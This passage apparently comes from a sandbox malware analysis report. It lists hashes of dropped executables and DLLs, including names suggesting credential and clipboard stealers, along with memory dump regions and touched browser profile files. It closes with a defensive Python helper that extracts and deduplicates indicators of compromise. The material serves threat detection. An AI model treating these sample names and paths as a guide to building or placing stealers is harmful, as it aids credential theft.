| SHA512 | aeba492b1286b034a2769f53aa2bb1a14485a9ba313d828dd8b79a55a8532968b2586a60df6ebd0ae7ef2aeaf6d93f81ecb71c1e22fa7df5fc117f0a3054aeaa |
memory/5836-413-0x0000000000400000-0x000000000047E000-memory.dmp
memory/5836-419-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5288-428-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5752-431-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/3656-433-0x0000000000400000-0x0000000000434000-memory.dmp
memory/3656-434-0x0000000000400000-0x0000000000434000-memory.dmp
memory/3656-436-0x0000000000400000-0x0000000000434000-memory.dmp
memory/5288-438-0x00000000070A0000-0x00000000070B0000-memory.dmp
memory/5020-439-0x0000000000010000-0x000000000004E000-memory.dmp
memory/5020-440-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5752-442-0x0000000074530000-0x0000000074CE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
memory/4224-467-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/4224-468-0x0000000000890000-0x0000000001276000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b76c361694f2709057c4118729dd6874 |
| SHA1 | e65845c0639be1ee3a9829063866407f0507eaf8 |
| SHA256 | 34d60d303ac766ff31ce08e522c3d6f8b1d5fe0e5d4917b1a524b06a90f7f8ab |
| SHA512 | b42891d987baf945052b1766db9bd8d406c71541f264702f8f1d9103eb6c5b282e7af921d448441ff7eabf692526211e7309b1fd6dac0f3a5c91194f0582750f |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 4d1f0d9bfac03f5237d800cd61ed1133 |
| SHA1 | a8d2884e093ac24d23d48c804f617a0115fe697c |
| SHA256 | 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18 |
| SHA512 | acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 5283cdd674c839582d319aabafaad58e |
| SHA1 | 04f113b8d35ed25942fcf11e830c3161004f5c18 |
| SHA256 | 46e15742c0c686e214623ca91a21ca993f9cce2c2c548b6ddb417662248ff9e2 |
| SHA512 | f3488dd33861a33f6d82f5ae575a5e07e9397cf8dcc17470b7e08f5d8da254980b35b34978cd2366de70964f184a43e7ac2bcb1c437b08495b15a8ff3c4e205d |
memory/2516-524-0x0000000000400000-0x000000000047E000-memory.dmp
memory/2516-533-0x0000000000710000-0x000000000076A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kos4.exe
| MD5 | 01707599b37b1216e43e84ae1f0d8c03 |
| SHA1 | 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2 |
| SHA256 | cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd |
| SHA512 | 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642 |
memory/5416-537-0x00000000000E0000-0x00000000000E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
memory/5416-546-0x00007FF910480000-0x00007FF910F41000-memory.dmp
memory/4224-547-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/2516-548-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5416-549-0x00000000008F0000-0x0000000000900000-memory.dmp
memory/5020-550-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5020-552-0x0000000006F80000-0x0000000006F90000-memory.dmp
memory/2516-558-0x0000000000400000-0x000000000047E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
| MD5 | f521630a23b8bd0f2260fefb2c596495 |
| SHA1 | 014454c72bbf67b103372cc8f9b965ed6b83b74f |
| SHA256 | 99076c101d2d20a0f7c97376e330f7b39ee5dd6885582f49eff6c041973fc3f1 |
| SHA512 | 4e033586834f15bc471184706cc10822ac6be52a2639df7b5973f14fda7bd440829f15e7ce112049c6d04cb445ef5393943ed47e19c2107bfc063db13d6e0d4d |
memory/2516-564-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5140-568-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5416-572-0x00007FF910480000-0x00007FF910F41000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58a41b.TMP
| MD5 | 5cc4538b07c8f34a247c6d48c2261b0e |
| SHA1 | f0b65d86d1ccda4b1f1cdbdf138048d4080c6b74 |
| SHA256 | 6d779d5a4e89eb054b3cfe1f3915820b6e74322e3b3162546c83d8b4ee223b57 |
| SHA512 | 9b5bced25890ecd69b2869881b07c864f72764ebd467889dab49868262fe45bcdb127c91490b8300772908499ba111b1df8d33f1b803b677410b623acb8001c6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8c359756c68ee738e048a20f0448108d |
| SHA1 | c1da824b903a2c22a7e1e5c1bfdbbfbddd59f765 |
| SHA256 | 4e9d40b60e35dc7a6ed8527e26ae49195f5866a162bfd6d9c0e48f69bf77c7d3 |
| SHA512 | 06735de224699e7db24f6a72e65171a6539a3ebc32b390120e9f85147a4e3e5ec757639bdaaeabbe8f5efb1422ca0d66b367977beca205fcc05ae32de813fa84 |
memory/6084-598-0x00000000020D0000-0x00000000020D1000-memory.dmp
memory/4240-600-0x0000000000340000-0x0000000000720000-memory.dmp
memory/4240-599-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5900-647-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1316-660-0x0000000000400000-0x0000000000636000-memory.dmp
memory/1316-663-0x0000000000400000-0x0000000000636000-memory.dmp
memory/6108-668-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/5648-669-0x00007FF756D80000-0x00007FF757321000-memory.dmp
memory/5900-686-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3320-685-0x00000000084A0000-0x00000000084B6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 00dc05c447c6740fd73bc621115297dc |
| SHA1 | 9470771fc370a685748c564f84bdbf07b66ad7fc |
| SHA256 | 91fadadd0724ce9b773c110ab1dc216a212e22f4f33b7aaec55029a8b54b7a51 |
| SHA512 | 2631c262405a04f433a018e9c11499d68e32ad4de696f59b3578a2c0974d3ac08f860e420dd21f55ee456f007fcc5ff533adb089a148de287d6b16a43b78d31c |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1kyplwh1.ovt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1508-741-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1508-745-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1508-749-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8a336ddfe8c1d49cd38a347ad707c36b |
| SHA1 | c8a9255d432684e04d5b2179407a4a0950d32c26 |
| SHA256 | 3920e4ee446b70e4cad86c2d588ff3ba7145893b2cd2403210615c819044907e |
| SHA512 | d1c31e8d5a8c0d6b8891c021a6869cc5a593dc58f138bfba427a1ebcf8c52d70aac07b408afb208127383f0667cca49d82a56d6046775a92df7396397e31c7ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3765fb3e9e7747734556a785c280bb6a |
| SHA1 | f96bb7f089d35ff65141b340b40eba0ea1f0e57f |
| SHA256 | 694160fe8781796e8a445e5320e81088f46a224252f57d091922278796b93576 |
| SHA512 | 21bd87ae5cd67d9399ce24ddd984bf5e1b0d9c61b8007eb450e801fe0088f51b503919a2a8182f879abe08351529b5b8f4915ef523c387cb0c31bd3c86ef0cb0 |
memory/6108-774-0x0000000000400000-0x0000000000D1B000-memory.dmp
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
| MD5 | a5b509a3fb95cc3c8d89cd39fc2a30fb |
| SHA1 | 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c |
| SHA256 | 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529 |
| SHA512 | 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | e913b0d252d36f7c9b71268df4f634fb |
| SHA1 | 5ac70d8793712bcd8ede477071146bbb42d3f018 |
| SHA256 | 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da |
| SHA512 | 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4 |
memory/6108-821-0x0000000000400000-0x0000000000D1B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a695d51c499897c8fe97d4fb63ef2b5d |
| SHA1 | 669a44936e6d3ebb34c856c686038db287415aed |
| SHA256 | 3b54d651cf14ca9dca9ae8e5ce4ac9a828b457a2d6f2165eab11e786c0014401 |
| SHA512 | 5985ce9d5e4bf2229fc29a2854bfd9f521f1fc5ac5957ad108a37c12b54075ccea15783a8c95fa055b619f98b32b8af4d16291edb73fe94900068d0c3737be0e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e995d18897d6713452b8639bd30b46e5 |
| SHA1 | 6b3651fc2abfb886559669548726370ea007d354 |
| SHA256 | d70011f15fe5000c018986e0846eab0d20248f870e4247c1201ab9174ba31cd2 |
| SHA512 | 1cf6bdd89edc5aeb31635ee2b64ba87a80c189ba8055c9fc77d1e23d46966f56968fcf6565cf1e55021b50b85e8512bace6200e25e45d59482c022a9105c7a65 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | d49696f0b63bb8d34e695b667c2efd68 |
| SHA1 | c5a5bfba74f5b7329257075c5c0750e03b3db2ba |
| SHA256 | 1cf5a22c5295a9494e85b5ce1d387b2a2b6aeb4da3bc79ada879f1aecaad644f |
| SHA512 | 9ba6611b33b2eaf26b4b3f7b85a64034af2301102d219e5a0879e33154f24306c259d49fc41328c5fb36b78df5aa536e74b0ac2ba1a7ded2c69f751b05f1e07d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3ee88b924d8e6322aff109dc6d81f343 |
| SHA1 | f2c06daaa55d171c92bcfd777dbe2cca13512a3a |
| SHA256 | 9e78daed4515b5edafa1e15eb10de64bf8acd6355ddd09ff50b9731ae026c7a2 |
| SHA512 | bceb069c6a7ab29b68ba704079c57734cb66746ef00d114335e7e0c1f42144a3ef7443b5a29ee7987989d2e0bb0d6416afbfba23ab5f53f6e614d479ae9fc815 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f1f0dad27869f33c4d000037c0ca901e |
| SHA1 | a06495765d0b6ba246ccd58e5a6860afd230dc32 |
| SHA256 | 275884804c9336182bc36bdc7d2ccf9775925b5154c728518152f36649f9e17b |
| SHA512 | dc72600519105ecb7a65320e741e1a6a4cf49e1b6bc681f8763d77658512b362ea3410fd53dfee9a80b091a19d6ad8b5abdf5fa450f29281ffa8f851f18ce9e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 229012f14d951ccfefe7ca58a5085537 |
| SHA1 | 6a65bab8ff7a187f0f20c90537a307d32211f5a2 |
| SHA256 | fe0b1ec19bb1e5cea4911cc96f784939eb21460e8a4926ed9759ed114238c9ad |
| SHA512 | 51a02e5b82304820af88eab9b3b4891bcf5bf559cd833ad3a5f87a71b9c43e9030a6b24654fe5269c84f6094ca9d8b22b6e7b8db189f1988bc32459b2a4bb4e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 8e60143b1ceb95b04e859bb0cc14175b |
| SHA1 | 31cc8dda786ef4593c2d27473bccaf2641b93e7b |
| SHA256 | 8a8ee4da0b14f5473c42ad351faa08db94bd6728d7befb33adc44547b9fb4cc4 |
| SHA512 | c0f0238faf64b8c79435bec4c4d260c98087cbc10637192eb93bb0d5457789fc4e0cc579cc95581dd9ca4800d4074daaac576e5b1b1011c8b6f1f38ed1c31fe4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 1f779a63292035dd614c71ecb9cec0c7 |
| SHA1 | 1e765e2be3d4b5969bfe6be7baa8cfa04d3d3374 |
| SHA256 | 1f2fdd98cc213b4851cac588a3a052d1b137d91a350f30216dc20f16ce280ade |
| SHA512 | 2644b96c24f816843441beb584fd6cd09633e956989aff29d3226666ed184e60edbb2b72158ea733297d73834f9b42e406771a65549860db8a71a03ad83da90c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | f9359eb6b0d42a99ac54dd9c065185ab |
| SHA1 | 2734818db16473f6d022ea4d5e3d28a9d9ba6054 |
| SHA256 | 6fbe7e888e00ec2c302822d28b2215ffd29d6fcbf904c4ff0dbdfdddbba5f081 |
| SHA512 | ae3400365e999e53bcde6e525b6881bf7a24b16274382b846df167e3e74f7db8ffe7050166caaa42d6bc9f80873654bd8cce898655274e884d49fe435c15f980 |
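The listing above is raw sandbox output: each dropped file is a path line followed by four hash rows, memory regions appear as memory/<pid>-<seq>-<start>-<end> lines, and the same file is often listed more than once. The Python below is an added triage helper, not part of this report or of the sandbox's own tooling. It parses that format, rejects digests of the wrong length (a truncated copy-paste is a common way to end up with a useless IOC), collapses repeats by SHA256, and separates the executables dropped under Temp and Roaming from the Edge profile files and from PowerShell's own __PSScriptPolicyTest_*.ps1 start-up probe, neither of which is a payload. The bucket names and the path regexes are my assumptions; the sample lines are copied from this page, with two entries repeated exactly as the report repeats them.

```python
import re

# Excerpt of the dropped-file / memory-dump listing on this page, embedded
# verbatim so the example runs offline. Two entries are deliberately repeated
# exactly as they appear in the report, to exercise deduplication.
LISTING = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6cafafdc33f9ebbe3a7167e77f2eb7cc |
| SHA1 | e6d20199ebba7b986b015e853356659f3c2f467c |
| SHA256 | ac417c9c51fc9aebdfbeeda04c913b9c6fab8845de9435dc81885f30ba149033 |
| SHA512 | 236495b61dd715d554d6a193bd2a767ce86342a7c0d7148c304c7c7f28d212a92c00d104a52b9e0e823d3b2c953ff4950398e61e2987693e9f5a988fae5460ad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6cafafdc33f9ebbe3a7167e77f2eb7cc |
| SHA1 | e6d20199ebba7b986b015e853356659f3c2f467c |
| SHA256 | ac417c9c51fc9aebdfbeeda04c913b9c6fab8845de9435dc81885f30ba149033 |
| SHA512 | 236495b61dd715d554d6a193bd2a767ce86342a7c0d7148c304c7c7f28d212a92c00d104a52b9e0e823d3b2c953ff4950398e61e2987693e9f5a988fae5460ad |
memory/1360-223-0x0000000074530000-0x0000000074CE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4532.exe
| MD5 | 107010beec076341ed4728108616ae14 |
| SHA1 | d521c427abf30e3dea44b2e3a6715310b13d5236 |
| SHA256 | a68c5e94f561ee7f4e5edc6e64db2ccc6083a9a34acd478da0b5a3003a233e52 |
| SHA512 | c3646f0d843750387e5b839247777ae8ad2ac09c8a421f5f51f9da537de753fbe2598b172e704a1e80265305f08c66cd5e60130cbaca52774bc0451ab032ca78 |
C:\Users\Admin\AppData\Local\Temp\4532.exe
| MD5 | 107010beec076341ed4728108616ae14 |
| SHA1 | d521c427abf30e3dea44b2e3a6715310b13d5236 |
| SHA256 | a68c5e94f561ee7f4e5edc6e64db2ccc6083a9a34acd478da0b5a3003a233e52 |
| SHA512 | c3646f0d843750387e5b839247777ae8ad2ac09c8a421f5f51f9da537de753fbe2598b172e704a1e80265305f08c66cd5e60130cbaca52774bc0451ab032ca78 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
| MD5 | a5b509a3fb95cc3c8d89cd39fc2a30fb |
| SHA1 | 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c |
| SHA256 | 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529 |
| SHA512 | 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9 |
memory/6108-821-0x0000000000400000-0x0000000000D1B000-memory.dmp
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
MEM_DUMP = re.compile(r"^memory/(\d+)-(\d+)-(0x[0-9A-Fa-f]+)-(0x[0-9A-Fa-f]+)-memory\.dmp$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_listing(text):
    """Return (files, dumps). Each file is {"path", "hashes"}; each dump is
    {"pid", "seq", "start", "end"}. A digest of the wrong length for its
    algorithm (a truncated copy-paste) is rejected, not silently stored."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length: {digest}")
            current["hashes"][algo] = digest
            continue
        m = MEM_DUMP.match(line)
        if m:
            pid, seq, start, end = m.groups()
            dumps.append({"pid": int(pid), "seq": int(seq),
                          "start": int(start, 16), "end": int(end, 16)})
            current = None          # a dump line never carries hash rows
            continue
        current = {"path": line, "hashes": {}}   # any other line starts a file entry
        files.append(current)
    return files, dumps


def classify(path):
    """Heuristic triage bucket for a path (my assumption, not the report's)."""
    p = path.lower()
    if "\\microsoft\\edge\\user data\\" in p:
        return "browser-profile"           # Edge profile files touched during detonation
    if p.rsplit("\\", 1)[-1].startswith("__psscriptpolicytest_"):
        return "powershell-policy-probe"   # written by PowerShell itself at start-up
    if re.search(r"\\appdata\\(local\\temp|roaming)\\.*\.(exe|dll|bat|ps1)$", p):
        return "dropped-payload"
    return "other"


def dedupe_by_sha256(files):
    """Collapse repeated entries: one record per SHA256, with every path seen."""
    unique = {}
    for f in files:
        sha = f["hashes"].get("SHA256")
        if sha is None:
            continue
        rec = unique.setdefault(sha, {"hashes": f["hashes"], "paths": [],
                                      "kind": classify(f["path"])})
        if f["path"] not in rec["paths"]:
            rec["paths"].append(f["path"])
    return unique


def payload_iocs(text):
    """Sorted SHA256 list of the dropped payloads, browser and host noise removed."""
    files, _ = parse_listing(text)
    return sorted(sha for sha, rec in dedupe_by_sha256(files).items()
                  if rec["kind"] == "dropped-payload")


def dump_sizes_by_pid(dumps):
    """{pid: [(start, size), ...]} so repeated dumps of one region stand out."""
    out = {}
    for d in dumps:
        out.setdefault(d["pid"], []).append((d["start"], d["end"] - d["start"]))
    return out
```

Run `payload_iocs(LISTING)` to get the two unique payload hashes from the excerpt; feeding the whole listing in instead gives the set of dropped-executable hashes worth blocking, with the Edge profile churn stripped out. `dump_sizes_by_pid` turns the memory/ lines into per-process region sizes, which makes it easy to spot the same region (for example 0x400000 in several PIDs) being dumped repeatedly across the run.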